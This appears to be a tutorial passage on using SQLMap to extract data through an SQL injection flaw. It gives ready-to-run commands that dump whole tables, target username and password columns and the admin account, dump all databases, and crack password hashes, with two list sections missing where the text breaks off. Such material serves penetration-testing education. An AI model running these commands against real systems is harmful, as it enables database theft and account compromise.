Data Extraction Techniques

Learn how to extract data from databases using SQLMap

After identifying the database structure, you can extract data from specific tables and columns of interest.

Dumping Table Data (--dump)

To extract all data from a specific table:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T table_name --dump

This command retrieves all records from the specified table. For large tables, SQLMap will ask if you want to retrieve all entries or a subset.

To extract data from specific columns only:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T table_name -C "username,password,email" --dump

This is useful when you're only interested in certain columns, especially in tables with many columns or large amounts of data.

To extract records that match specific criteria:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T users -C "username,password" --dump --where "username='admin'"

This allows you to filter the data based on specific conditions, similar to a SQL WHERE clause.

For large tables, you can extract a specific range of records:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D database_name -T users --dump --start 1 --stop 100

This retrieves only records 1 through 100, which is useful for paginating through large datasets.

To extract data from all tables in all databases:

sqlmap -u "http://www.example.com/vuln.php?id=1" --dump-all

SQLMap can attempt to identify and crack password hashes:

sqlmap -u "http://www.example.com/vuln.php?id=1" --passwords

This command:

You can also specify a custom wordlist with --passwords-file=/path/to/wordlist.txt.

For large databases, consider these optimization techniques:

These options can significantly improve the efficiency of data extraction, especially for large databases with complex data types.